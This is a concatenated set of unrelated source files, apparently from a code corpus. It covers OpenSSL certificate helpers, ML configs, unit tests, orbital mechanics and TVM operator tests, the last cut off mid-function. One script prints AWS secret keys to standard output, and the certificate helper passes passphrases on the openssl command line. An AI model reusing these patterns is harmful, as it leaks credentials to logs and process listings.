:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = <PASSWORD>pass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', pemfile, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def _parse_sha1_thumbprint_openssl(output):
# type: (str) -> str
"""Get SHA1 thumbprint from buffer
:param str buffer: buffer to parse
:rtype: str
:return: sha1 thumbprint of buffer
"""
# return just thumbprint (without colons) from the above openssl command
# in lowercase. Expected openssl output is in the form:
# SHA1 Fingerprint=<thumbprint>
return ''.join(util.decode_string(
output).strip().split('=')[1].split(':')).lower()
def get_sha1_thumbprint_pfx(pfxfile, passphrase):
# type: (str, str) -> str
"""Get SHA1 thumbprint of PFX
:param str pfxfile: name of the pfx file to export
:param str passphrase: passphrase for pfx
:rtype: str
:return: sha1 thumbprint of pfx
"""
if pfxfile is None:
raise ValueError('pfxfile is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# compute sha1 thumbprint of pfx
pfxdump = subprocess.check_output(
['openssl', 'pkcs12', '-in', pfxfile, '-nodes', '-passin',
'pass:' + passphrase]
)
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate(input=pfxdump)[0])
def get_sha1_thumbprint_pem(pemfile):
# type: (str) -> str
"""Get SHA1 thumbprint of PEM
:param str pfxfile: name of the pfx file to export
:rtype: str
:return: sha1 thumbprint of pem
"""
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint', '-in', pemfile],
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate()[0])
def generate_pem_pfx_certificates(config):
# type: (dict) -> str
"""Generate a pem and a derived pfx file
:param dict config: configuration dict
:rtype: str
:return: sha1 thumbprint of pfx
"""
# gather input
pemfile = settings.batch_shipyard_encryption_public_key_pem(config)
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
if pemfile is None:
pemfile = util.get_input('Enter public key PEM filename to create: ')
if pfxfile is None:
pfxfile = util.get_input('Enter PFX filename to create: ')
if passphrase is None:
while util.is_none_or_empty(passphrase):
passphrase = getpass.getpass('Enter password for PFX: ')
if len(passphrase) == 0:
print('passphrase cannot be empty')
privatekey = pemfile + '.key'
# generate pem file with private key and no password
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
try:
subprocess.check_call(
['openssl', 'req', '-new', '-nodes', '-x509', '-newkey',
'rsa:2048', '-keyout', privatekey, '-out', f.name, '-days', '730',
'-subj', '/C=US/ST=None/L=None/O=None/CN=BatchShipyard']
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', privatekey, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
logger.debug('created public key PEM file: {}'.format(pemfile))
# convert pem to pfx for Azure Batch service
subprocess.check_call(
['openssl', 'pkcs12', '-export', '-out', pfxfile, '-inkey',
privatekey, '-in', f.name, '-certfile', f.name,
'-passin', 'pass:', '-passout', 'pass:' + passphrase]
)
logger.debug('created PFX file: {}'.format(pfxfile))
finally:
# remove rsa private key file
fp = pathlib.Path(privatekey)
if fp.exists():
fp.unlink()
# remove temp cert pem
fp = pathlib.Path(f.name)
if fp.exists():
fp.unlink()
# get sha1 thumbprint of pfx
return get_sha1_thumbprint_pfx(pfxfile, passphrase)
def get_encryption_pfx_settings(config):
# type: (dict) -> tuple
"""Get PFX encryption settings from configuration
:param dict config: configuration settings
:rtype: tuple
:return: pfxfile, passphrase, sha1 tp
"""
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
sha1_cert_tp = settings.batch_shipyard_encryption_pfx_sha1_thumbprint(
config)
# manually get thumbprint of pfx if not exists in config
if util.is_none_or_empty(sha1_cert_tp):
if pfx_passphrase is None:
pfx_passphrase = <PASSWORD>('Enter password for PFX: ')
sha1_cert_tp = get_sha1_thumbprint_pfx(pfxfile, pfx_passphrase)
settings.set_batch_shipyard_encryption_pfx_sha1_thumbprint(
config, sha1_cert_tp)
return PfxSettings(
filename=pfxfile, passphrase=pfx_passphrase, sha1=sha1_cert_tp)
def _rsa_encrypt_string(data, config):
# type: (str, dict) -> str
"""RSA encrypt a string
:param str data: clear text data to encrypt
:param dict config: configuration dict
:rtype: str
:return: base64-encoded cipher text
"""
if util.is_none_or_empty(data):
raise ValueError('invalid data to encrypt')
inkey = settings.batch_shipyard_encryption_public_key_pem(config)
derived = False
if inkey is None:
# derive pem from pfx
derived = True
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(
config)
inkey = derive_public_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
try:
if inkey is None:
raise RuntimeError('public encryption key is invalid')
proc = subprocess.Popen(
['openssl', 'rsautl', '-encrypt', '-pubin', '-inkey', inkey],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
ciphertext = util.base64_encode_string(
proc.communicate(input=util.encode_string(data))[0])
if proc.returncode != 0:
raise RuntimeError(
'openssl encryption failed with returncode: {}'.format(
proc.returncode))
return ciphertext
finally:
if derived:
fp = pathlib.Path(inkey)
if fp.exists():
fp.unlink()
def _rsa_decrypt_string_with_pfx(ciphertext, config):
# type: (str, dict) -> str
"""RSA decrypt a string
:param str ciphertext: cipher text in base64
:param dict config: configuration dict
:rtype: str
:return: decrypted cipher text
"""
if util.is_none_or_empty(ciphertext):
raise ValueError('invalid ciphertext to decrypt')
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
pemfile = derive_private_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
if pemfile is None:
raise RuntimeError('cannot decrypt without valid private key')
cleartext = None
try:
data = util.base64_decode_string(ciphertext)
proc = subprocess.Popen(
['openssl', 'rsautl', '-decrypt', '-inkey', pemfile],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cleartext = proc.communicate(input=data)[0]
finally:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
return cleartext
def encrypt_string(enabled, string, config):
# type: (bool, str, dict) -> str
"""Encrypt a string
:param bool enabled: if encryption is enabled
:param str string: string to encrypt
:param dict config: configuration dict
:rtype: str
:return: encrypted string if enabled
"""
if enabled:
return _rsa_encrypt_string(string, config)
else:
return string
| 1.726563 | 2 |
libs/configs/COCO/cfgs_res50_1x_coco_v3.py | lj-ecjtu/Cascade_FPN_Tensorflow-master | 43 | 1143 | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import os
import tensorflow as tf
'''
gluoncv backbone + multi_gpu
'''
# ------------------------------------------------
VERSION = 'Cascade_FPN_Res50_COCO_1x_20190421_v3'
NET_NAME = 'resnet50_v1d'
ADD_BOX_IN_TENSORBOARD = True
# ---------------------------------------- System_config
ROOT_PATH = os.path.abspath('../')
print(20*"++--")
print(ROOT_PATH)
GPU_GROUP = "0,1,2,3,4,5,6,7"
NUM_GPU = len(GPU_GROUP.strip().split(','))
SHOW_TRAIN_INFO_INTE = 20
SMRY_ITER = 200
SAVE_WEIGHTS_INTE = 80000
SUMMARY_PATH = ROOT_PATH + '/output/summary'
TEST_SAVE_PATH = ROOT_PATH + '/tools/test_result'
INFERENCE_IMAGE_PATH = ROOT_PATH + '/tools/inference_image'
INFERENCE_SAVE_PATH = ROOT_PATH + '/tools/inference_results'
if NET_NAME.startswith("resnet"):
weights_name = NET_NAME
elif NET_NAME.startswith("MobilenetV2"):
weights_name = "mobilenet/mobilenet_v2_1.0_224"
else:
raise NotImplementedError
PRETRAINED_CKPT = ROOT_PATH + '/data/pretrained_weights/' + weights_name + '.ckpt'
TRAINED_CKPT = os.path.join(ROOT_PATH, 'output/trained_weights')
EVALUATE_DIR = ROOT_PATH + '/output/evaluate_result_pickle/'
# ------------------------------------------ Train config
RESTORE_FROM_RPN = False
IS_FILTER_OUTSIDE_BOXES = False
FIXED_BLOCKS = 0 # allow 0~3
FREEZE_BLOCKS = [True, False, False, False, False] # for gluoncv backbone
USE_07_METRIC = True
CUDA9 = True
EVAL_THRESHOLD = 0.5
RPN_LOCATION_LOSS_WEIGHT = 1.
RPN_CLASSIFICATION_LOSS_WEIGHT = 1.0
FAST_RCNN_LOCATION_LOSS_WEIGHT = 1.0
FAST_RCNN_CLASSIFICATION_LOSS_WEIGHT = 1.0
RPN_SIGMA = 3.0
FASTRCNN_SIGMA = 1.0
MUTILPY_BIAS_GRADIENT = None # 2.0 # if None, will not multipy
GRADIENT_CLIPPING_BY_NORM = None # 10.0 if None, will not clip
EPSILON = 1e-5
MOMENTUM = 0.9
BATCH_SIZE = 1
WARM_SETP = int(0.25 * SAVE_WEIGHTS_INTE)
LR = 5e-4 * 2 * 1.25 * NUM_GPU * BATCH_SIZE
DECAY_STEP = [11*SAVE_WEIGHTS_INTE, 16*SAVE_WEIGHTS_INTE, 20*SAVE_WEIGHTS_INTE] # 50000, 70000
MAX_ITERATION = 20*SAVE_WEIGHTS_INTE
# -------------------------------------------- Data_preprocess_config
DATASET_NAME = 'coco' # 'pascal', 'coco'
PIXEL_MEAN = [123.68, 116.779, 103.939] # R, G, B. In tf, channel is RGB. In openCV, channel is BGR
PIXEL_MEAN_ = [0.485, 0.456, 0.406]
PIXEL_STD = [0.229, 0.224, 0.225] # R, G, B. In tf, channel is RGB. In openCV, channel is BGR
IMG_SHORT_SIDE_LEN = 800
IMG_MAX_LENGTH = 1333
CLASS_NUM = 80
# --------------------------------------------- Network_config
INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.01)
BBOX_INITIALIZER = tf.random_normal_initializer(mean=0.0, stddev=0.001)
WEIGHT_DECAY = 0.00004 if NET_NAME.startswith('Mobilenet') else 0.0001
IS_ASSIGN = True
# ---------------------------------------------Anchor config
USE_CENTER_OFFSET = True
LEVLES = ['P2', 'P3', 'P4', 'P5', 'P6']
BASE_ANCHOR_SIZE_LIST = [32, 64, 128, 256, 512]
ANCHOR_STRIDE_LIST = [4, 8, 16, 32, 64]
ANCHOR_SCALES = [1.0]
ANCHOR_RATIOS = [0.5, 1., 2.0]
ROI_SCALE_FACTORS = [[10., 10., 5.0, 5.0], [20., 20., 10.0, 10.0], [40., 40., 20.0, 20.0]]
ANCHOR_SCALE_FACTORS = [10., 10., 5.0, 5.0]
# --------------------------------------------FPN config
SHARE_HEADS = True
KERNEL_SIZE = 3
RPN_IOU_POSITIVE_THRESHOLD = 0.7
RPN_IOU_NEGATIVE_THRESHOLD = 0.3
TRAIN_RPN_CLOOBER_POSITIVES = False
RPN_MINIBATCH_SIZE = 256
RPN_POSITIVE_RATE = 0.5
RPN_NMS_IOU_THRESHOLD = 0.7
RPN_TOP_K_NMS_TRAIN = 12000
RPN_MAXIMUM_PROPOSAL_TARIN = 2000
RPN_TOP_K_NMS_TEST = 6000
RPN_MAXIMUM_PROPOSAL_TEST = 1000
# -------------------------------------------Fast-RCNN config
ROI_SIZE = 14
ROI_POOL_KERNEL_SIZE = 2
USE_DROPOUT = False
KEEP_PROB = 1.0
SHOW_SCORE_THRSHOLD = 0.6 # only show in tensorboard
FAST_RCNN_NMS_IOU_THRESHOLD = 0.5 # 0.6
FAST_RCNN_NMS_MAX_BOXES_PER_CLASS = 100
FAST_RCNN_IOU_POSITIVE_THRESHOLD = 0.5
FAST_RCNN_IOU_NEGATIVE_THRESHOLD = 0.0 # 0.1 < IOU < 0.5 is negative
FAST_RCNN_MINIBATCH_SIZE = 512 # if is -1, that is train with OHEM
FAST_RCNN_POSITIVE_RATE = 0.25
ADD_GTBOXES_TO_TRAIN = False
| 2.03125 | 2 |
python/delta/tests/test_exceptions.py | vibhaska/delta | 1 | 1144 | <gh_stars>1-10
#
# Copyright (2020) The Delta Lake Project Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import delta.exceptions as exceptions
from delta.testing.utils import DeltaTestCase
class DeltaExceptionTests(DeltaTestCase):
def _raise_concurrent_exception(self, exception_type):
e = exception_type("")
self.spark.sparkContext._jvm.scala.util.Failure(e).get()
def test_capture_concurrent_write_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentWriteException
self.assertRaises(exceptions.ConcurrentWriteException,
lambda: self._raise_concurrent_exception(e))
def test_capture_metadata_changed_exception(self):
e = self.spark._jvm.io.delta.exceptions.MetadataChangedException
self.assertRaises(exceptions.MetadataChangedException,
lambda: self._raise_concurrent_exception(e))
def test_capture_protocol_changed_exception(self):
e = self.spark._jvm.io.delta.exceptions.ProtocolChangedException
self.assertRaises(exceptions.ProtocolChangedException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_append_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentAppendException
self.assertRaises(exceptions.ConcurrentAppendException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_delete_read_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentDeleteReadException
self.assertRaises(exceptions.ConcurrentDeleteReadException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_delete_delete_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentDeleteDeleteException
self.assertRaises(exceptions.ConcurrentDeleteDeleteException,
lambda: self._raise_concurrent_exception(e))
def test_capture_concurrent_transaction_exception(self):
e = self.spark._jvm.io.delta.exceptions.ConcurrentTransactionException
self.assertRaises(exceptions.ConcurrentTransactionException,
lambda: self._raise_concurrent_exception(e))
if __name__ == "__main__":
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=4)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=4)
| 1.796875 | 2 |
day10/samematrix.py | nikhilsamninan/python-files | 0 | 1145 | def matrix_form():
r = int(input("Enter the no of rows"))
c = int(input("Enter the no of columns"))
matrix=[]
print("Enter the enteries")
for i in range(r):
a = []
for j in range(c):
a.append(int(input()))
matrix.append(a)
return(matrix)
def check_matrix(first_matrix,sec_matrix):
if(first_matrix==sec_matrix):
print("same")
else:
print("not same")
print("Enter the 1st matrix")
first_matrix = matrix_form()
print(first_matrix)
print("Enter the 2nd matrix")
sec_matrix = matrix_form()
print(sec_matrix)
check_matrix(first_matrix,sec_matrix) | 3.921875 | 4 |
extractFeatures.py | PatrickJReed/Longboard | 1 | 1146 | #!/home/ubuntu/miniconda2/bin/python
from __future__ import division
import sys
import glob, os, gc
import uuid
import os.path
import csv
import numpy as np
from time import time
from subprocess import (call, Popen, PIPE)
from itertools import product
import shutil
import re
import pickle
from boto3.session import Session
import boto3
import h5py
import umap
import hdbscan
from keras.models import load_model
from keras.models import Model
from keras import backend as K
from keras.utils import multi_gpu_model
##Path to Data
basepath = "/home/ubuntu/"
subject = sys.argv[1]
with open("config.txt") as f:
config = [line.rstrip() for line in f]
print config[0]
print config[1]
session = Session(aws_access_key_id=config[0],aws_secret_access_key=config[1])
s3 = session.resource('s3')
s3 = boto3.client ('s3')
s3.download_file('for-ndar',os.path.join("metadata/", subject + ".txt"),os.path.join(basepath,subject + ".txt"))
with open(subject + ".txt") as f:
Cells = [line.rstrip() for line in f]
session = Session(aws_access_key_id=config[0],aws_secret_access_key=config[1])
s3 = session.resource('s3')
s3.meta.client.download_file('bsmn-data',os.path.join('Inception_Transfer_Model.h5'),os.path.join(basepath,'Inception_Transfer_Model.h5'))
feat_extractor = load_model(os.path.join(basepath,'Inception_Transfer_Model.h5'))
parallel_model = multi_gpu_model(feat_extractor, gpus=2)
count = 0
for cell in Cells:
print(cell)
cell_size=0
cell_ids = []
s3.meta.client.download_file('bsmn-data',os.path.join(subject, cell+'_IDs.h5'),os.path.join(basepath,cell+'_IDs.h5'))
f = h5py.File(os.path.join(basepath,cell+'_IDs.h5'), 'r')
cell_ids = f['ID']
for cid in cell_ids:
cid = cid.decode('utf-8')
s3.meta.client.download_file('bsmn-data',os.path.join(subject, cell+'_'+cid+'.h5'),os.path.join(basepath,cell+'_'+cid+'.h5'))
xyz = h5py.File(os.path.join(basepath,cell+'_'+cid+'.h5'), 'r')
os.remove(os.path.join(basepath,cell+'_'+cid+'.h5'))
if count == 0:
X = xyz['X']
Y = xyz['Y']
Z = parallel_model.predict(X, batch_size = 128)
count+=1
length = len(Y)
U = [cid] * length
else:
X = xyz['X']
Y = np.append(Y,xyz['Y'], axis=0)
z = feat_extractor.predict(X, batch_size = 128)
Z = np.append(Z,z, axis=0)
length = len(xyz['Y'])
U = U + ([cid] * length)
print(Z.shape)
hf = h5py.File(subject+'_ef.h5', 'w')
hf.create_dataset('Y', data=Y)
hf.create_dataset('Z', data=Z)
hf.close()
session = Session(aws_access_key_id=config[0],aws_secret_access_key=config[1])
s3 = session.resource('s3')
s3.meta.client.upload_file(os.path.join(subject+'_ef.h5'),'bsmn-data',os.path.join(subject, subject+'_ef.h5'))
call(['sudo', 'shutdown', '-h', 'now']) | 1.84375 | 2 |
kepler.py | mdbernard/astrodynamics | 0 | 1147 | import numpy as np
from stumpff import C, S
from CelestialBody import BODIES
from numerical import newton, laguerre
from lagrange import calc_f, calc_fd, calc_g, calc_gd
def kepler_chi(chi, alpha, r0, vr0, mu, dt):
''' Kepler's Equation of the universal anomaly, modified
for use in numerical solvers. '''
z = alpha*chi**2
return (r0*vr0/np.sqrt(mu))*chi**2*C(z) + \
(1 - alpha*r0)*chi**3*S(z) + \
r0*chi - np.sqrt(mu)*dt
def dkepler_dchi(chi, alpha, r0, vr0, mu, dt):
''' Derivative of Kepler's Equation of the universal anomaly,
modified for use in numerical solvers. '''
z = alpha*chi**2
return (r0*vr0/np.sqrt(mu))*chi*(1 - alpha*chi**2*S(z)) + \
(1 - alpha*r0)*chi**2*C(z) + r0
def d2kepler_dchi2(chi, alpha, r0, vr0, mu, dt):
''' Second derivative of Kepler's Equation of the universal
anomaly, modified for use in numerical solvers. '''
z = alpha*chi**2
S_ = S(z)
return (r0*vr0/np.sqrt(mu))*(1 - 3*z*S_ + z*(C(z) - 3*S_)) + \
chi*(1 - z*S_)*(1 - alpha*r0)
def solve_kepler_chi(r_0, v_0, dt, body=BODIES['Earth'], method='laguerre', tol=1e-7, max_iters=100):
''' Solve Kepler's Equation of the universal anomaly chi using the specified
numerical method. Applies Algorithm 3.4 from Orbital Mechanics for Engineering
Students, 4 ed, Curtis.
:param r_0: `iterable` (km) initial position 3-vector
:param v_0: `iterable` (km/s) initial velocity 3-vector
:param dt: `float` (s) time after initial state to solve for r, v as 3-vectors
:param body: `CelestialBody` (--) the celestial body to use for orbital parameters
:param method: `str` (--) which numerical method to use to solve Kepler's Equation
:param tol: `float` (--) decimal tolerance for numerical method (default 1e-7 is IEEE 745 single precision)
:param max_iters: `int` (--) maximum number of iterations in numerical method before breaking
:return: (km) final position 3-vector, (km/s) final velocity 3-vector
'''
VALID_METHODS = ('laguerre', 'newton')
mu = body.mu # (km**3/s**2) gravitational parameter of the specified primary body
r0 = np.linalg.norm(r_0) # (km) initial position magnitude
v0 = np.linalg.norm(v_0) # (km/s) initial velocity magnitude
vr0 = np.dot(v_0, r_0)/r0 # (km/s) initial radial velocity magnitude
alpha = 2/r0 - v0**2/mu # (1/km) inverse of semi-major axis
chi0 = np.sqrt(mu)*np.abs(alpha)*dt
if method not in VALID_METHODS:
print(f'Method \'{method}\' is not valid, must be one of {VALID_METHODS}.\nDefaulting to laguerre method.')
chi, _, _ = laguerre(chi0, kepler_chi, dkepler_dchi, d2kepler_dchi2, alpha, r0, vr0, mu, dt)
elif method == 'newton':
chi, _, _ = newton(chi0, kepler_chi, dkepler_dchi, alpha, r0, vr0, mu, dt)
else: # method == 'laguerre'
chi, _, _ = laguerre(chi0, kepler_chi, dkepler_dchi, d2kepler_dchi2, alpha, r0, vr0, mu, dt)
f = calc_f(chi, r0, alpha)
g = calc_g(dt, mu, chi, alpha)
r_1 = f*r_0 + g*v_0
r1 = np.linalg.norm(r_1)
fd = calc_fd(mu, r1, r0, alpha, chi)
gd = calc_gd(chi, r1, alpha)
v_1 = fd*r_0 + gd*v_0
return r_1, v_1
def solve_kepler_E(e, Me, tol=1e-7, max_iters=100):
''' Solve Kepler's Equation in the form containing Eccentric Anomaly (E),
eccentricity (e), and Mean Anomaly of Ellipse (Me). Uses Algorithm 3.1 from Orbital
Mechanics for Engineering Students, 4 ed, Curtis. '''
# TODO: have this function make use of one of the numerical methods in numerical.py
def f(E, e, Me):
return E - e*np.sin(E) - Me
def fp(E, e):
return 1 - e*np.cos(E)
E = Me + e/2 if Me < np.pi else Me - e/2
ratio = f(E, e, Me)/fp(E, e)
iters = 0
while abs(ratio) > tol and iters < max_iters:
E -= ratio
ratio = f(E, e, Me)/fp(E, e)
iters += 1
E -= ratio
converged = np.abs(ratio) <= tol
return E, iters, converged
def test():
''' Test the functionality of solve_kepler_chi
and solve_kepler_laguerre using Problem 3.20 from
Orbital Mechanics for Engineering Students, 4 ed, Curtis.
'''
# given starting information
Earth = BODIES['Earth'] # `CelestialBody` (--) Earth and all the Earth things
r_0 = np.array([20000, -105000, -19000]) # (km) initial position vector
v_0 = np.array([0.9, -3.4, -1.5]) # (km/s) initial velocity vector
dt = 2*60*60 # (s) time of interest after initial time
# given correct answer from textbook
correct_r_1 = np.array([26338, -128750, -29656]) # (km) final position vector
correct_v_1 = np.array([0.86280, -3.2116, -1.4613]) # (km/s) final velocity vector
# solve using above methods
r_n, v_n = solve_kepler_chi(r_0, v_0, dt, Earth, method='newton')
r_l, v_l = solve_kepler_chi(r_0, v_0, dt, Earth, method='laguerre')
# check correctness
# tolerance based on significant figures of given answers
newton_valid = np.allclose(r_n, correct_r_1, atol=1) and np.allclose(v_n, correct_v_1, atol=1e-4)
laguerre_valid = np.allclose(r_l, correct_r_1, atol=1) and np.allclose(v_l, correct_v_1, atol=1e-4)
return all([newton_valid, laguerre_valid])
if __name__ == '__main__':
print(test())
| 2.640625 | 3 |
nicos_demo/vpgaa/setups/pgai.py | jkrueger1/nicos | 12 | 1148 | description = 'PGAA setup with XYZOmega sample table'
group = 'basic'
sysconfig = dict(
datasinks = ['mcasink', 'chnsink', 'csvsink', 'livesink']
)
includes = [
'system',
'reactor',
'nl4b',
'pressure',
'sampletable',
'pilz',
'detector',
'collimation',
]
devices = dict(
mcasink = device('nicos_mlz.pgaa.devices.MCASink',
settypes = {'point'},
detectors = ['_60p', 'LEGe'],
),
chnsink = device('nicos_mlz.pgaa.devices.CHNSink',
settypes = {'point'},
detectors = ['_60p', 'LEGe'],
),
csvsink = device('nicos_mlz.pgaa.devices.CSVDataSink',
settypes = {'point'},
),
)
startupcode = """
SetDetectors('_60p', 'LEGe')
SetEnvironment(chamber_pressure)
printinfo("============================================================")
printinfo("Welcome to the NICOS PGAI demo setup.")
printinfo("============================================================")
"""
| 1.898438 | 2 |
tests/python/relay/test_op_level2.py | ravikumarvc/incubator-tvm | 3 | 1149 | <gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Support level2 operator test cases.
"""
import numpy as np
import tvm
from tvm import autotvm
from tvm import relay
from tvm.relay import transform
from tvm.relay.testing import ctx_list, run_infer_type
from tvm.contrib import util
import topi.testing
def test_conv1d_infer_type():
# symbolic in batch dimension
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.ty.TensorType((n, c, w), "float32"))
w = relay.var("w")
y = relay.nn.conv1d(x, w,
kernel_size=3,
padding=(1, 1),
channels=2)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 224), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(2, 10, 3), "float32")
# infer by shape of w, mixed precision
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.TensorType((n, c, w), "int8"))
w = relay.var("w", relay.TensorType((2, 10, 3), "int8"))
y = relay.nn.conv1d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222), "int32")
# infer shape in case of different dtypes for input and weight.
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.TensorType((n, c, w), "uint8"))
w = relay.var("w", relay.TensorType((2, 10, 3), "int8"))
y = relay.nn.conv1d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222), "int32")
# Infer with NWC
n, c, w = 4, 32, 224
x = relay.var("x", relay.TensorType((n, w, c), "int8"))
wt = relay.var("w")
y = relay.nn.conv1d(x, wt,
kernel_size=3,
padding=(1, 1),
channels=16,
data_layout="NWC",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, w, 16), "int32")
def test_conv1d_run():
def run_test_conv1d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
fref=None,
dilation=1,
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv1d(x, w,
padding=padding,
dilation=dilation,
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
ref_res = topi.testing.conv1d_ncw_python(
data.astype(out_dtype), kernel.astype(out_dtype), 1, padding, dilation)
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
# normal conv1d
dshape = (1, 3, 224)
kshape = (10, 3, 3)
run_test_conv1d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=3)
# mixed precision
run_test_conv1d("int8", "int32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=3)
# dilated conv2d
dshape = (1, 3, 18)
kshape = (10, 3, 3)
run_test_conv1d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=3, dilation=3)
def test_conv2d_infer_type():
# symbolic in batch dimension
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.ty.TensorType((n, c, h, w), "float32"))
w = relay.var("w")
y = relay.nn.conv2d(x, w,
kernel_size=(3, 3),
padding=(1, 1),
channels=2)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 224, 224), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(2, 10, 3, 3), "float32")
# infer by shape of w, mixed precision
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), "int8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3), "int8"))
y = relay.nn.conv2d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222), "int32")
# infer shape in case of different dtypes for input and weight.
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), "uint8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3), "int8"))
y = relay.nn.conv2d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222), "int32")
# Infer with a different layout
n, c, h, w = 4, 32, 224, 224
x = relay.var("x", relay.TensorType((n//4, c//4, h, w, 4, 4), "int8"))
wt = relay.var("w")
y = relay.nn.conv2d(x, wt,
kernel_size=(3, 3),
padding=(1, 1),
channels=16,
data_layout="NCHW4n4c",
kernel_layout="OIHW4o4i",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(1, 4, 224, 224, 4, 4), "int32")
assert yy.args[1].checked_type == relay.TensorType(
(4, 8, 3, 3, 4, 4), "int8")
# Infer with NHWC
n, c, h, w = 4, 32, 224, 224
x = relay.var("x", relay.TensorType((n, h, w, c), "int8"))
wt = relay.var("w")
y = relay.nn.conv2d(x, wt,
kernel_size=(3, 3),
padding=(1, 1),
channels=16,
data_layout="NHWC",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
